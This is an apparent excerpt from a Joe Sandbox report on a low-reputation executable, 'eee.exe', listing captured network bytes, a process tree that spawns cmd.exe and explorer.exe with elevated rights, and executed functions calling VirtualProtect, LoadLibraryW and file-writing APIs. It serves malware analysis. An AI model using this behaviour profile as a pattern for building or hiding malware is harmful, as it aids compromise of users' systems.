aa 4f 1e e7 3b 7d 57 16 e5 c6 86 c8 5a 1f 5d 94 65 73 4b f6 af c5 f4 48 f9 70 1f 48 0a 33 a5 24 3c 00 9a 9c 90 d9 80 5f 01 aa c7 96 c0 94 bd 54 eb e0 21 6a 7b c3 f3 a7 09 dd 7c 6c a3 25 02 1a Data Ascii: ]]lsKHpH3$3_T!jn%\|l%J~wC-hX'MXvU@HcYEG\!`w1,LkfG&NcenvZ)V[nlsK0aI`FpTo/\|Q.O;}WZ]esKHpH3$<_T!j{\|l%
2023-09-26 07:46:57 UTC	863	IN	Data Raw: 0f c7 b3 96 82 5b 72 68 ec 62 1f 4d ef 94 13 d1 51 cf a6 3a 51 08 e5 80 3d 21 d6 bf 85 93 c0 82 46 44 b3 ee 8f f8 8d de 4d fe f9 2a 73 39 da d3 be 29 c4 1f 75 a6 3c 0e 03 f8 53 8e c6 f4 67 eb d3 5f 8e 7c 5a 46 34 9a e5 5d da f2 a1 5e c9 ba c4 85 22 eb 83 1f ed bd 8c df 95 53 4c 19 2f a8 1e 62 81 6d ec 0e 68 e8 c8 01 5a 7c 5c 2d 15 79 f1 d2 c9 45 be dd 8f 37 9f 9a b9 91 1d 7e 0a 31 ef 90 c9 69 01 4c 64 c2 9f 4d 34 fa 5e 09 47 ff f6 7d ab 40 77 41 63 20 f1 60 6a 99 30 27 52 fe 4f 90 93 24 77 17 6d d3 75 7b d0 d7 52 3c a9 37 50 19 a8 2e df 15 8e d7 dc 6a 9c 4a 94 c1 b4 74 37 5f 87 3b fe 0a b5 72 0f 19 0e a3 d1 9e d7 78 8d a6 bb 6e ef 74 0d d1 51 2f b8 3a 51 a4 fb 80 3d 85 c8 bf 85 25 11 a5 46 89 62 e2 8f 4c 5c 98 4d 74 28 04 73 10 08 d6 be 66 c4 1f 75 cd 3c Data Ascii: [rhbMQ:Q=!FDM*s9)u<Sg_\|ZF4]^"SL/bmhZ\|\-yE7~1iLdM4^G}@wAc `j0'RO$wmu{R<7P.jJt7_;rxntQ/:Q=%FbL\Mt(sfu<
2023-09-26 07:46:57 UTC	879	IN	Data Raw: 54 99 a9 27 47 e9 ba c4 59 c9 f2 08 d4 de de 8f 1b 80 4d 90 28 c4 af e5 70 46 6c 27 7f 4a 37 ca ff d0 99 22 86 fe fa f4 74 73 1e 75 30 fe ae 4a b2 15 7c 72 e4 8f 2b 9e dd 88 3a a9 28 25 76 94 b7 36 7f 48 d6 60 90 68 6b bd 2e f6 01 5c cd 6e ec 70 34 8b b9 c8 17 dd 51 3f ca 16 51 14 c6 41 05 2b 9c cb 77 47 20 ba 0e c6 f0 c8 14 6e 7f 98 a6 7d f4 92 28 da c7 57 94 5e ec 7a 9d cf f9 f7 97 af 12 9e fa 6b e8 47 54 1f 88 e1 35 fa d1 a5 75 03 0c 78 62 8c 05 06 ad 56 4e d6 90 fe fd 1a 78 dd 8c fb 18 0d 6e 45 e6 52 a2 f9 47 90 d4 6c 25 7b 7c 09 88 54 0d 2b a8 3c fa 3a 0d b3 b0 6c e8 a5 d8 d8 20 f2 43 49 e6 8c 7e f6 08 8c ba c4 7e f7 55 c1 81 bb de 8f 4c 22 fd bd f9 ae af e5 36 c5 36 f4 cc 25 37 ca 0f d0 02 60 d2 95 fa f4 2f 00 e7 1f f0 a8 ae 4a c0 d4 c8 d8 b6 db 2b Data Ascii: T'GYM(pFl'J7"tsu0J\|r+:(%v6H`hk.\np4Q?QA+wG n}(W^zkGT5uxbVNxnERGl%{\|T+<:l CI~~UL"66%7`/J+
2023-09-26 07:46:57 UTC	895	IN	Data Raw: 47 22 34 35 64 50 98 72 50 5d 79 68 df 2e 6c e9 e9 96 78 81 a1 ee 50 82 02 72 63 37 c8 c1 53 9c 38 30 e8 5f e6 fd 31 e0 b5 34 53 6b d6 88 e5 c2 68 f3 53 c4 6c d1 15 c6 3d 55 e9 fa 85 c1 c0 e3 46 e3 83 3b bf 6e bd 15 7d 9e ca 12 45 4d ec f2 88 0c f2 6b 43 50 0a c4 34 7b 64 72 f1 66 50 b9 eb ba b6 96 63 c3 0e fe de 3c e7 75 9c 8f 27 b9 fa 6d f2 a9 83 d7 3d fb 8c 1d 75 90 7c d1 ce ab 2f d4 60 7c dd 92 89 39 f9 b6 ba fa 6d ec f5 ed c0 a2 2d 82 88 c5 6e 75 9f 1a 68 d7 1d 1f eb 14 df d4 28 08 35 9b 83 38 a9 26 d2 f2 69 26 a1 d1 c1 40 4d 88 40 86 85 c6 c6 e2 8c d0 08 bb bb 6a 77 1b 7a 62 4e 74 85 98 4c 0c 38 b8 6b dd 41 b2 69 bf 40 61 e5 50 65 c6 e6 70 77 71 ae ca 5f bb 0d 40 6c e8 c4 c5 5e 95 35 78 e5 d6 ea 02 3d 68 b6 6b 51 46 d4 bf e7 31 6a 3f 52 85 6a 62 16 Data Ascii: G"45dPrP]yh.lxPrc7S80_14SkhSl=UF;n}EMkCP4{drfPc<u'm=u\|/`\|9m-nuh(58&i&@M@jwzbNtL8kAi@aPepwq_@l^5x=hkQF1j?Rjb

Target ID:	1
Start time:	09:46:51
Start date:	26/09/2023
Path:	C:\Users\user\Desktop\eee.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\eee.exe
Imagebase:	0x400000
File size:	458'592 bytes
MD5 hash:	89F71046C8298C6EF2DB92FE202F9B43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:46:56
Start date:	26/09/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x120000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:46:56
Start date:	26/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff78b990000
File size:	873'472 bytes
MD5 hash:	86191D9E0E30631DB3E78E4645804358
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:47:08
Start date:	26/09/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe50000
File size:	4'676'944 bytes
MD5 hash:	6F5D250EAEDE1D80806ECBC487C7B9B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.8%
Total number of Nodes:	718
Total number of Limit Nodes:	19

Executed Functions

Function 00405EA5 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 679
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 0040642C

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AllocGlobal
String ID: !
API String ID: 3761449716-2657877971
Opcode ID: ec52265771eee72b3f4452cb54cfbc9ad685f998414e1bc88d0e1daa63d049e5
Instruction ID: 436ed9a305dc4258b72404cf8b7ae360ebb221739fa34613113bda604bb525d9
Opcode Fuzzy Hash: ec52265771eee72b3f4452cb54cfbc9ad685f998414e1bc88d0e1daa63d049e5
Instruction Fuzzy Hash: 38822DB8E057189FCB54DFA9C584A9DBBF1BF48300F1189AAE888E7351E734A941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00406430 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00406B2F
VirtualProtect.KERNELBASE ref: 00406B86

Strings

!, xrefs: 0040642C

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ProtectVirtual
String ID: !
API String ID: 544645111-2657877971
Opcode ID: 116953b4af9fb4e9e11dc353739f7ba77f24c1a857e1e2875c9a8acfc3a8749a
Instruction ID: ee5705d68fc0621c89ea22197bed66af5e1da034c076e00138d2b4d5af4832d7
Opcode Fuzzy Hash: 116953b4af9fb4e9e11dc353739f7ba77f24c1a857e1e2875c9a8acfc3a8749a
Instruction Fuzzy Hash: CF425DB4D053299FCB50DF69C981B9EBBF0BF48304F1185AAE888A7351D734AA84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00405E60 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 422
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetMenu.USER32(00000000), ref: 00405E82

Strings

%xiU, xrefs: 00405E8D
!, xrefs: 0040642C

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Menu
String ID: !$%xiU
API String ID: 3711407533-725872005
Opcode ID: b1594898deb63245d7758f837ef899f893a73df5068362a1362bcfdcbcd010e6
Instruction ID: 887c8235b403df86801179acd8a0b8d7e3c8e51755e232ff2d75eb82ef62ca93
Opcode Fuzzy Hash: b1594898deb63245d7758f837ef899f893a73df5068362a1362bcfdcbcd010e6
Instruction Fuzzy Hash: C722FE78E057189FCB44DFA9C584A9DBBF1BF8C700F11886AE888E7365E634A841CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00407A20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406BF8: GlobalAlloc.KERNELBASE(004037AA,?), ref: 00406C35

CreateDirectoryW.KERNELBASE(00403393,00000000), ref: 00407B12

Part of subcall function 00406C3C: GlobalFree.KERNELBASE ref: 00406C54

Strings

'@, xrefs: 00407B68
'@, xrefs: 00407B43

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Global$AllocCreateDirectoryFree
String ID: '@$'@
API String ID: 3700899436-3155417233
Opcode ID: bd75b31b167f1875d5edc7f9696c55c30200a1fc807ad731ae4d1d78ae6e6c24
Instruction ID: edd25a490aac6dc977e813baad126f4ec0a86c0cd62c5fcb9d6a69c277f1be6e
Opcode Fuzzy Hash: bd75b31b167f1875d5edc7f9696c55c30200a1fc807ad731ae4d1d78ae6e6c24
Instruction Fuzzy Hash: 2A513EB49047099FCB00EF69C585A9EBBF0FF48304F01886EE898A7351E738E9559F56

Uniqueness

Uniqueness Score: -1.00%

Function 00407A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406BF8: GlobalAlloc.KERNELBASE(004037AA,?), ref: 00406C35

CreateDirectoryW.KERNELBASE(00403393,00000000), ref: 00407B12

Part of subcall function 00406C3C: GlobalFree.KERNELBASE ref: 00406C54

Strings

'@, xrefs: 00407B68
'@, xrefs: 00407B43

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Global$AllocCreateDirectoryFree
String ID: '@$'@
API String ID: 3700899436-3155417233
Opcode ID: 28be915c54affddc4729dce71769d8c45cc408bc3c0ffacf241fd4e68848aac3
Instruction ID: aa8aafffd2c54a59091b93f6bafdd7437a7450a2d2de63b2f109ebfde88164d1
Opcode Fuzzy Hash: 28be915c54affddc4729dce71769d8c45cc408bc3c0ffacf241fd4e68848aac3
Instruction Fuzzy Hash: 6D414FB49047099FCB00EF69C185A9EBBF0FF48304F01882EE898A7351E738E9559F56

Uniqueness

Uniqueness Score: -1.00%

Function 00407A60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406BF8: GlobalAlloc.KERNELBASE(004037AA,?), ref: 00406C35

CreateDirectoryW.KERNELBASE(00403393,00000000), ref: 00407B12

Part of subcall function 00406C3C: GlobalFree.KERNELBASE ref: 00406C54

Strings

'@, xrefs: 00407B68
'@, xrefs: 00407B43

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Global$AllocCreateDirectoryFree
String ID: '@$'@
API String ID: 3700899436-3155417233
Opcode ID: d7bda03d5ed437d4d1fd0c811c6bf30fff57007e0158fd5e191656ee5a8d089c
Instruction ID: f8036aecf98099d2292e6d1482daa5c1b73f660db22a220b94bfd434b21e0785
Opcode Fuzzy Hash: d7bda03d5ed437d4d1fd0c811c6bf30fff57007e0158fd5e191656ee5a8d089c
Instruction Fuzzy Hash: 0F4140B49047099FCB00EF69C185A9EBBF0FF48304F01882EE898A7350E739E9559F55

Uniqueness

Uniqueness Score: -1.00%

Function 00407A80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406BF8: GlobalAlloc.KERNELBASE(004037AA,?), ref: 00406C35

CreateDirectoryW.KERNELBASE(00403393,00000000), ref: 00407B12

Part of subcall function 00406C3C: GlobalFree.KERNELBASE ref: 00406C54

Strings

'@, xrefs: 00407B68
'@, xrefs: 00407B43

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Global$AllocCreateDirectoryFree
String ID: '@$'@
API String ID: 3700899436-3155417233
Opcode ID: 1baa73a8198a061828fa3cd2ec4ac67f2c0da969a43751c49829a793ad393ea2
Instruction ID: 9f902a9bb84f65a41bb18fbac270e6a7cd2ec8352ca6a7955e470593d8099f18
Opcode Fuzzy Hash: 1baa73a8198a061828fa3cd2ec4ac67f2c0da969a43751c49829a793ad393ea2
Instruction Fuzzy Hash: 65411FB49047099FCB00EF69C185A9EBBF0FF48314F01882EE898A7351E739E9559F56

Uniqueness

Uniqueness Score: -1.00%

Function 00407AE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(00403393,00000000), ref: 00407B12

Part of subcall function 00406C3C: GlobalFree.KERNELBASE ref: 00406C54

Strings

'@, xrefs: 00407B68
'@, xrefs: 00407B43

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: CreateDirectoryFreeGlobal
String ID: '@$'@
API String ID: 808218448-3155417233
Opcode ID: 60fa12905f8644aef20dbe438f751f7dd9b9e78db9fc4aaed7a06a78782d69cd
Instruction ID: eae933e87686c63cdee4242ea0279eba1052c00cac2858f05235a1781bc01cd6
Opcode Fuzzy Hash: 60fa12905f8644aef20dbe438f751f7dd9b9e78db9fc4aaed7a06a78782d69cd
Instruction Fuzzy Hash: 83211EB8A097099FCB00EF69C18599EBBF0EF48314F01882AF898A7341E735E9559F55

Uniqueness

Uniqueness Score: -1.00%

Function 00407AC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(00403393,00000000), ref: 00407B12

Strings

'@, xrefs: 00407B43

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: CreateDirectory
String ID: '@
API String ID: 4241100979-1210607465
Opcode ID: f20425eeb907325e2cbb6be2a2589b2428e3009a766802858ca7ece4c91de063
Instruction ID: 2a5236093c5b8610f5a7e6a604d0127502498f4bf5cfccd1c5879ab3a95325ed
Opcode Fuzzy Hash: f20425eeb907325e2cbb6be2a2589b2428e3009a766802858ca7ece4c91de063
Instruction Fuzzy Hash: 34211FB89047099FCB00DF69C184A9EBBF0BF48304F01C92AF89897311E739E9558F52

Uniqueness

Uniqueness Score: -1.00%

Function 00406450 Relevance: 3.3, APIs: 2, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f496e90f52df9ed12f12e69f1d60e74ccec5d9889a9b628044c8859830d1ed97
Instruction ID: f94b586d8f6c395551e39c8a745b67d9715432737f2a60f0a7453ddf59780579
Opcode Fuzzy Hash: f496e90f52df9ed12f12e69f1d60e74ccec5d9889a9b628044c8859830d1ed97
Instruction Fuzzy Hash: EFF13DB4A053289FDB50DF69C984B9DBBF0BF49304F1185AAE888E7351D734AA84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 004050DA Relevance: 3.3, APIs: 2, Instructions: 256
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00405234
VirtualProtect.KERNELBASE ref: 004053F4

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID:
API String ID: 3279857687-0
Opcode ID: 6f3b6b58cc798b65b40562f150d8f74626dd20ae0a368c7f175ad821b7cbc292
Instruction ID: 7b5e00e761d318b1bb871d3cbc103ba1824824d210acc69df2594f2dd63a4ba4
Opcode Fuzzy Hash: 6f3b6b58cc798b65b40562f150d8f74626dd20ae0a368c7f175ad821b7cbc292
Instruction Fuzzy Hash: A9D10CB8E057199FCB44DFA9C584A9EFBF0FF48304F11896AE898E7351E234A8418F51

Uniqueness

Uniqueness Score: -1.00%

Function 00407000 Relevance: 3.2, APIs: 2, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1fd32f8efc538b27597b80e8ebb7ca4e6cb408276d5bc795a6ee8aa11ff0ee6
Instruction ID: 32ecb97d040c2d9c6dc94614249ac4be201376fc4cbfbf10e59f24776f4ce9ac
Opcode Fuzzy Hash: e1fd32f8efc538b27597b80e8ebb7ca4e6cb408276d5bc795a6ee8aa11ff0ee6
Instruction Fuzzy Hash: 748188B4904209DFDB04DFA8D584BAEBBF0BF48314F10856AE854AB390D778E945CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00414521 Relevance: 3.1, APIs: 2, Instructions: 70
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0041457E
RtlAllocateHeap.NTDLL(00000008,00000000,00419248,00000010,00410846,00000001,0000008C,?,?,00411EC0,00000008,00418D38,00000008,00411F8E,00000000,00000001), ref: 004145BC

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AllocateHeap__lock
String ID:
API String ID: 4078605025-0
Opcode ID: 317f5bf3f39dbfbc2a0a06a98825f77c9525b3e02e3bcd8677084faa84a676bb
Instruction ID: b74d44655fc8f9feb3aba109d4647400965de5f4e24344972c4eb44f0d2c5578
Opcode Fuzzy Hash: 317f5bf3f39dbfbc2a0a06a98825f77c9525b3e02e3bcd8677084faa84a676bb
Instruction Fuzzy Hash: 48210872D01215B7CB219B25AC41BEF7332ABC0764F24822FE9256B3D0DB3C4981865D

Uniqueness

Uniqueness Score: -1.00%

Function 00408914 Relevance: 3.1, APIs: 2, Instructions: 55
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00408956
WriteFile.KERNELBASE ref: 0040899B

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
